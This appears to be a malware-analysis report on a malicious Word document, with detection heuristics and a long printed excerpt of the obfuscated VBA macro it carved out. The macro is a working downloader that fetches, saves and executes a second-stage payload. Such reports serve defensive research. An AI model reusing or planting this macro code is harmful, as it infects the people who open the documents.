Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ea1e1c586e38d1b…

MALICIOUS

Office (OLE)

57.5 KB Created: 2016-10-18 09:34:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: 1081d2b66b0147ae4c7d6f5aab486f81 SHA-1: a495123f9fe0d7cf2375b1de6dcafffb28418499 SHA-256: 0ea1e1c586e38d1bd9cf5a7c11c5bad4ec8dec78e679660ee24a1196304982c6
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro, triggered automatically, uses `CreateObject` and `CallByName` to execute code that appears to download and run a second-stage payload. The obfuscation and auto-execution mechanism strongly suggest a malicious downloader.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5138 bytes
SHA-256: 59142d27ddb2e923ce1f63193e9ef5a96c698f33227bdbe02f26ab70095c0225
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Function ghNCtWppVfZx(ByVal XpglqKjlfkLP As String, ByVal FoxjWhXVhRRv As String) As Boolean
Dim dHUvpLIBxbje As Object
Dim cDAtmgMwzifd As Variant
Dim uwYXZGZbVSYh As Integer
Dim FJIvzFapPoxp As Object
Dim AvNgMWAdFAwJ As String
On Error GoTo pZTjEVAdkvWl
AvNgMWAdFAwJ = LvEaAQLfcpSl("1/7/QUUIMNYsfwsfT/3MNYTN")
Set FJIvzFapPoxp = CreateObject(AvNgMWAdFAwJ)
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("ofqP"), 1, LvEaAQLfcpSl("UFH"), XpglqKjlfkLP, False
CallByName FJIvzFapPoxp, LvEaAQLfcpSl("eofT"), 1
uwYXZGZbVSYh = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("tvubuT"), 2)
If uwYXZGZbVSYh <> 100 + 100 Then
GoTo pZTjEVAdkvWl
End If
cDAtmgMwzifd = CallByName(FJIvzFapPoxp, LvEaAQLfcpSl("zepCftopqtfS"), 2)
Set dHUvpLIBxbje = CreateObject(LvEaAQLfcpSl("nbfsuT/CEPEB"))
KgmBwNiAFOKP dHUvpLIBxbje
xYheJuZKfaQv dHUvpLIBxbje
awGBIfgvjbAc dHUvpLIBxbje, cDAtmgMwzifd
DsIbCsAMYYQK dHUvpLIBxbje, FoxjWhXVhRRv
PdLDSioJAVSH dHUvpLIBxbje
ghNCtWppVfZx = True
Exit Function
pZTjEVAdkvWl:
ghNCtWppVfZx = False
End Function

Private Function IIzjPkemqqnL()
IIzjPkemqqnL = LvEaAQLfcpSl("ovS")
End Function

Private Sub KgmBwNiAFOKP(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fqzU"), 4, 1
End Sub

Private Function KPKaiNEnahVT() As String
Dim rJrhievvCfyl As Object
Dim QXTQfpZtKexX As String
Dim SHgDlrOjRXLV
SHgDlrOjRXLV = LvEaAQLfcpSl("udfkcPnfutzTfmjG/hojuqjsdT")
Set rJrhievvCfyl = CreateObject(SHgDlrOjRXLV)
SHgDlrOjRXLV = LvEaAQLfcpSl("sfempGmbjdfqTufH")
QXTQfpZtKexX = CallByName(rJrhievvCfyl, SHgDlrOjRXLV, VbMethod, 2)
If QXTQfpZtKexX <> "" Then
KPKaiNEnahVT = QXTQfpZtKexX & LvEaAQLfcpSl("0") & Rnd
End If
End Function

Private Function FiqyDLoZMATY(ByVal LWZLTNNGxYir As String) As Integer
Dim JRtxRzUKmPqn
JRtxRzUKmPqn = 1
While Mid(LWZLTNNGxYir, JRtxRzUKmPqn, 1) <> ""
JRtxRzUKmPqn = JRtxRzUKmPqn + 1
Wend
FiqyDLoZMATY = JRtxRzUKmPqn - 1
End Function

Private Sub zPfxwgLIQVwW(ByVal XpglqKjlfkLP As String)
Dim lyvRMzbxdroI As String
Dim VbVQyuDWGZld As Object
Dim xKPXWuUjiAdg
On Error GoTo pZTjEVAdkvWl
lyvRMzbxdroI = KPKaiNEnahVT
ghNCtWppVfZx XpglqKjlfkLP, lyvRMzbxdroI
xKPXWuUjiAdg = LvEaAQLfcpSl("mmfiT/uqjsdTX")
Set VbVQyuDWGZld = CreateObject(xKPXWuUjiAdg)
CallByName VbVQyuDWGZld, LvEaAQLfcpSl("dfyF"), 1, lyvRMzbxdroI
Exit Sub
pZTjEVAdkvWl:
End Sub

Private Sub awGBIfgvjbAc(ByVal uKFgvPVMydzM As Variant, ByVal DDPDWEuozhSo As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpSl("fujsX"), 1, DDPDWEuozhSo
End Sub

Private Sub vzJhVatEBVoy()
Dim VeiNJzUrDrDg
Dim jJBTFGDHthQs
Dim JQOckBcjjlel
VeiNJzUrDrDg = LvEaAQLfcpSl("eJguiOnRphWC")
JQOckBcjjlel = IIzjPkemqqnL
jJBTFGDHthQs = CallByName(Application, JQOckBcjjlel, VbMethod, VeiNJzUrDrDg)
End Sub

Private Function LvEaAQLfcpSl(ByVal lrgPbThREpKm As String) As String
Dim aaZFeTqSvrER As Integer
Dim AnBobeUQDpDD As String
LvEaAQLfcpSl = ""
For aaZFeTqSvrER = 1 To FiqyDLoZMATY(lrgPbThREpKm)
AnBobeUQDpDD = Chr(NVWkzqvezZgf(lrgPbThREpKm, aaZFeTqSvrER) - 1)
LvEaAQLfcpSl = AnBobeUQDpDD & LvEaAQLfcpSl
Next aaZFeTqSvrER
End Function

Private Sub xYheJuZKfaQv(ByVal eqSYWaSfWYQK As Variant)
CallByName eqSYWaSfWYQK, LvEaAQLfcpSl("ofqP"), 1
End Sub

Private Sub CPSnyVKvrvnG()
Dim YTRFoEHLxOEW
Dim OHBcICEmNbzK
Dim uTnRUWANbrxQ
uTnRUWANbrxQ = IIzjPkemqqnL
YTRFoEHLxOEW = LvEaAQLfcpSl("zpWCFubWiK{w")
OHBcICEmNbzK = CallByName(Application, uTnRUWANbrxQ, VbMethod, YTRFoEHLxOEW)
End Sub

Private Sub SsoTJTiTYzij()
Dim FbufXBvHPPwJ
Dim xRqqKnhlVdEi
Dim AgVQNZUXlDyD
AgVQNZUXlDyD = IIzjPkemqqnL
FbufXBvHPPwJ = LvEaAQLfcpSl("HowswLWzoTQD")
xRqqKnhlVdEi = CallByName(Application, AgVQNZUXlDyD, VbMethod, FbufXBvHPPwJ)
End Sub

Private Sub PdLDSioJAVSH(ByVal uKFgvPVMydzM As Variant)
CallByName uKFgvPVMydzM, LvEaAQLfcpS
... (truncated)